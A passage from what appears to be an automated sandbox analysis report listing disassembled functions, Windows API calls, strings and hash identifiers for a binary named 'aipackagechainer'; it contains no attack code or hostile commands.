FindFirstFileW.KERNEL32(?,00000000,?,?,?,0000000C,002A6D0D,000000FF), ref: 0024CE7B
FindClose.KERNEL32(00000000,?,0000000C,002A6D0D,000000FF), ref: 0024CEBF

Strings

!, xrefs: 0024CE83, 0024CEB3

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: !
API String ID: 2295610775-518105870
Opcode ID: bb348b814cfa64e540d1bb26bc09902ab20c2075212fa35219d09726dbe78583
Instruction ID: 359e90a47f0e2c3d4da46fdfbacc6441dee4fe942931d77393a80734f8c13b92
Opcode Fuzzy Hash: bb348b814cfa64e540d1bb26bc09902ab20c2075212fa35219d09726dbe78583
Instruction Fuzzy Hash: 0941C430A11549CFCB14DF68CC48BEEBBB4FF45324F248219E81597291D7759A14CF90

Function 0025EB00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

GetLocaleInfoW.KERNEL32(?,00000002,002BC440,00000000,?,00000000), ref: 0025EB71
GetLocaleInfoW.KERNEL32(?,00000002,00000015,?,00000078,-00000001,?,00000002,002BC440,00000000,?,00000000), ref: 0025EBAD

Strings

%d-%s, xrefs: 0025EBB7

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale$HeapProcess
String ID: %d-%s
API String ID: 3246605784-1781338863
Opcode ID: c55c66c2787100a34b01b0ae3b699bdebf7e8b752a6fcc474f0b561bc29db097
Instruction ID: 4a8b914a0ea04ad95cf6f981761e1cf7d5d544d74b03d0a0272d5fb0f3465e00
Opcode Fuzzy Hash: c55c66c2787100a34b01b0ae3b699bdebf7e8b752a6fcc474f0b561bc29db097
Instruction Fuzzy Hash: 4E31DF71910215AFDB04DF98CC49FAEFBB4FF05719F108119F415A7291DB719A14CB90

Function 00235AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,4938EAB5,?,00000000,?,00000000,002A21FD,000000FF), ref: 00235B38
FindClose.KERNEL32(00000000,?,4938EAB5,?,00000000,?,00000000,002A21FD,000000FF), ref: 00235B82

Strings

!, xrefs: 00235B40, 00235B76

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: !
API String ID: 2295610775-518105870
Opcode ID: 318ea63ee3b0689255b18b50b3248167cf6fc1e30898b873616394fced894ece
Instruction ID: b585e439f1173afd1877b98d2069e07c30b3bb3e30fa41c7cac80ee5b977d999
Opcode Fuzzy Hash: 318ea63ee3b0689255b18b50b3248167cf6fc1e30898b873616394fced894ece
Instruction Fuzzy Hash: 9921F4719009499FDB10DF68DC49BEEF7B8FF45324F104229E829A72D0DB705A08CB90

Function 002969CE Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00296A22
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00296A6C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00296B32

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: b02ce25d158db85f4a81bf8bd02913dd0722ad79eae582aa093a584e6cd3e1a2
Instruction ID: cab7ebde0be8bcd0a4a0dace1cfab991ad4783d957a2728fd0a6dffa9450f3de
Opcode Fuzzy Hash: b02ce25d158db85f4a81bf8bd02913dd0722ad79eae582aa093a584e6cd3e1a2
Instruction Fuzzy Hash: 0161BF719202079FDF28AF28CD9ABAA77E8FF04304F10817AE905D6585FB74D9A1CB50

Function 002116C0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 002769C8
GetVersionExW.KERNEL32(?), ref: 00276A13
IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00276A27

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Version$FeaturePresentProcessor
String ID:
API String ID: 1871528217-0
Opcode ID: 255616fda511a39c26b05650b19a481b3b64c0e894b3528b081267f0f108cb7c
Instruction ID: 31d38f396426c127815a652e768f3b1e93cfbb1686432b61a2ad2699d0f09bac
Opcode Fuzzy Hash: 255616fda511a39c26b05650b19a481b3b64c0e894b3528b081267f0f108cb7c
Instruction Fuzzy Hash: 4B614971B103254FE308CF2D9C896AABBD5EBC9341F04863FE49AC7291DA74C915CBA1

Function 00281363 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0028145B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00281465
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00281472

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3439c68c01be334fc44f15aa647285c30e2028f4b8a978ec0dbd37b70a7d773d
Instruction ID: 60f0c702c2398ef639c2fef51a113aae82230d1d3c0dd2b602093a22db521652
Opcode Fuzzy Hash: 3439c68c01be334fc44f15aa647285c30e2028f4b8a978ec0dbd37b70a7d773d
Instruction Fuzzy Hash: 2531D6749112299BCB21DF68DC897DDBBB8BF18310F5081EAE40CA7291EB709F918F45

Function 00238470 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,4938EAB5), ref: 002384CE

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Strings

%04d-%02d-%02d %02d-%02d-%02d, xrefs: 00238510

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: HeapLocalProcessTime
String ID: %04d-%02d-%02d %02d-%02d-%02d
API String ID: 1554148984-3768011868
Opcode ID: 9d17bf16d8460c1ad0dc4aeb9e78c600bc7724df3d79ec08090ff82b91b1f084
Instruction ID: 81c59c21d119143dcddd4737336cc02f807584befbca3de0871133378898367a
Opcode Fuzzy Hash: 9d17bf16d8460c1ad0dc4aeb9e78c600bc7724df3d79ec08090ff82b91b1f084
Instruction Fuzzy Hash: 60219FB1D14208ABDB14DF99D841BFEB7F8EB0C710F10422EF815A7280EB749950CBA5

Function 00282410 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7005f14389522480ac6fb9852cd731dda82be8c916b1cc2d4119a756cf47b29a
Instruction ID: c4508464257fd46cf4a0b8367cef0996f69f1d3a5c69d92b3a279c32004f56d4
Opcode Fuzzy Hash: 7005f14389522480ac6fb9852cd731dda82be8c916b1cc2d4119a756cf47b29a
Instruction Fuzzy Hash: 81F13B75E1121ADBDF18DFA9C880AADF7B5FF88314F158269E815AB380D730AD15CB90

Function 002373A0 Relevance: 3.1, APIs: 2, Instructions: 134windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,00000008,00000400,00000001,00000000,00000000,4938EAB5,?,00000001), ref: 002373EB
GetLastError.KERNEL32 ref: 002373F5

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AllocateErrorFormatHeapLastMessage
String ID:
API String ID: 4114510652-0
Opcode ID: 04a562de0c4d2891824dd04e9aab9e1c0089badb4bde19b4ee475cab8a23a881
Instruction ID: 5a29f278f4496918211a248d554c4561d653baf52cd69b89a42782773aeeff31
Opcode Fuzzy Hash: 04a562de0c4d2891824dd04e9aab9e1c0089badb4bde19b4ee475cab8a23a881
Instruction Fuzzy Hash: BC41E2B1A142169BDF24CF98D8057AEFBF8FF44714F14426AE905E7380E7B59D108B90

Function 0021C700 Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 0021C705
SetUnhandledExceptionFilter.KERNEL32(Function_00023920), ref: 0021C71B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: 0a67a4bed521ff2d6df5a2bdac84f46847d83651252c69d4fa85eaa0a096d4d9
Instruction ID: 9eecdc7e96eb594d6254e109bd8e03e598fdac97ebcbee2cc6dd6431758a3b44
Opcode Fuzzy Hash: 0a67a4bed521ff2d6df5a2bdac84f46847d83651252c69d4fa85eaa0a096d4d9
Instruction Fuzzy Hash: A8D0A9A08A6240AAD7008320AC093A02AA0032A308F058805E48A012928AF61EA68F13

Function 0026C330 Relevance: 2.7, Strings: 1, Instructions: 1452COMMON

Download Yara Rule

Strings

P?<u, xrefs: 0026C8CA

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID: P?<u
API String ID: 0-2531429983
Opcode ID: b517590e8e4f44c24ffd3c67fac128bb231eac65ff55b8d74bc3034728430790
Instruction ID: 566074156d0035bc5a4b08b629579621aed145f07c6d1829576b6eb137d18d67
Opcode Fuzzy Hash: b517590e8e4f44c24ffd3c67fac128bb231eac65ff55b8d74bc3034728430790
Instruction Fuzzy Hash: ECD27B70A1024ADFDB14DF68C884BADBBB4BF49304F248199E8499B352C775EDA5CF90

Function 0028F26A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0028F265,?,?,00000008,?,?,0029A394,00000000), ref: 0028F497

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 57f123c87f7e86a62e81174f4532944e1b74510b24217f6ea49f7a14fa4d83fb
Instruction ID: 20ab9e495805ef4dac2f1f9d2b2c3d598bc27d38cbd874a8b0b657155cf2267c
Opcode Fuzzy Hash: 57f123c87f7e86a62e81174f4532944e1b74510b24217f6ea49f7a14fa4d83fb
Instruction Fuzzy Hash: 6AB1BE39221609CFD754DF28C586B657BE0FF44364F2582A9E899CF2E1C335E9A1CB40

Function 0026D9F0 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

@, xrefs: 0026DE9D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1c782da47482841668cf26860def9a4b8286acb6565d8712eb44a2db6db88d5b
Instruction ID: bf94da240dfee8fb11a780a9cfb582f47329d8325515471f9095b34e65e680b1
Opcode Fuzzy Hash: 1c782da47482841668cf26860def9a4b8286acb6565d8712eb44a2db6db88d5b
Instruction Fuzzy Hash: 8D023E72A083008BC75CCF19D89156BF7E2BFCC314F15892EF89A93351DB74A956CA86

Function 0027CCD0 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0027CCE6

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 4f42bb76b1d636f9b2ebf5b08b9c5b295a5b2b97e733686a1ceb6aaec7fd3e1e
Instruction ID: 727bc2e0e7df51201820337ebe64d6d605e6aad48e8bc0fb8c6eca35ad2a5cbb
Opcode Fuzzy Hash: 4f42bb76b1d636f9b2ebf5b08b9c5b295a5b2b97e733686a1ceb6aaec7fd3e1e
Instruction Fuzzy Hash: 12512DB1E212158FDB24CF65E8897AABBF0FB48311F24C46AD409EB250D7759E54CFA0

Function 00296C21 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00296C75

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1737c6ea5a50dfc73405f843c1fb0b48cb67483ce213efe9ecbb9d56f5509eff
Instruction ID: e5f659e57d9444037c324dea868888714ca1bda8c88181c14652f5750f6846b4
Opcode Fuzzy Hash: 1737c6ea5a50dfc73405f843c1fb0b48cb67483ce213efe9ecbb9d56f5509eff
Instruction Fuzzy Hash: 6121C571A21216ABDF28AF24DD5AE7A73ECEF04310B10407BFD41C6181EB74ED608B54

Function 002968A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

EnumSystemLocalesW.KERNEL32(002969CE,00000001,00000000,?,-00000050,?,00296FFF,00000000,?,?,?,00000055,?), ref: 0029691A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4daf782e5153f9dddac79d3499b9bc9ae0d44d1620ecbd27ec2a25094b612c38
Instruction ID: c2c5cd45e7e9f8661b7e874c6fbb278a23b26b66f7078218366b5465edf8b39a
Opcode Fuzzy Hash: 4daf782e5153f9dddac79d3499b9bc9ae0d44d1620ecbd27ec2a25094b612c38
Instruction Fuzzy Hash: 0C1129362103019FEF189F39C89567AB7D2FF80358B19442DE58687A40D771B953CB40

Function 00296E50 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00296BEA,00000000,00000000,?), ref: 00296E7C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: bb884551f176a9bb8caebf05ed802771b027973748fa2bc11bfd46a1c1b878fc
Instruction ID: 5e152f869c28aaeaaabb5276416ac6e539c1f81536db6b13622661993e59fd60
Opcode Fuzzy Hash: bb884551f176a9bb8caebf05ed802771b027973748fa2bc11bfd46a1c1b878fc
Instruction Fuzzy Hash: DFF0F93A920227ABDF245A36C80EFBB77D4EB40354F154429ED45A3280EA70FD51C690

Function 002967B6 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0029680A

Strings

utf8, xrefs: 00296779

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 9f4179f1f4e92181948f897b4b4e5955f6c89cef9a968981509e85243a4004e7
Instruction ID: e517a9071c4beeeafacd9118e280e59b357e02dd59a1902eb64820241c8b6bac
Opcode Fuzzy Hash: 9f4179f1f4e92181948f897b4b4e5955f6c89cef9a968981509e85243a4004e7
Instruction Fuzzy Hash: 1BF02832A21205ABDB14AF34DC4EEBA33ECEF49310F11407AFA06D7281EA74AD048B54

Function 00296943 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

EnumSystemLocalesW.KERNEL32(00296C21,00000001,00000000,?,-00000050,?,00296FC3,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0029698D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 962c59c8446d3df98c69c0db948e153dd0cd89e5ffab1b922812a2920444f360
Instruction ID: 0f33fa808df3247b945f69dcb92ea075fe78e79d4e08269a82f412943cdcc05f
Opcode Fuzzy Hash: 962c59c8446d3df98c69c0db948e153dd0cd89e5ffab1b922812a2920444f360
Instruction Fuzzy Hash: F9F046363103055FEF146F79D889A7ABBD1EF81768B05482DFA454B680C6B1AC02CB10

Function 0028D47B Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028894A: EnterCriticalSection.KERNEL32(-002D80F0,?,0028A3A8,00000000,002D3738,0000000C,0028A36F,?,?,0028DCEA,?,?,0028D174,00000001,00000364,00000000), ref: 00288959

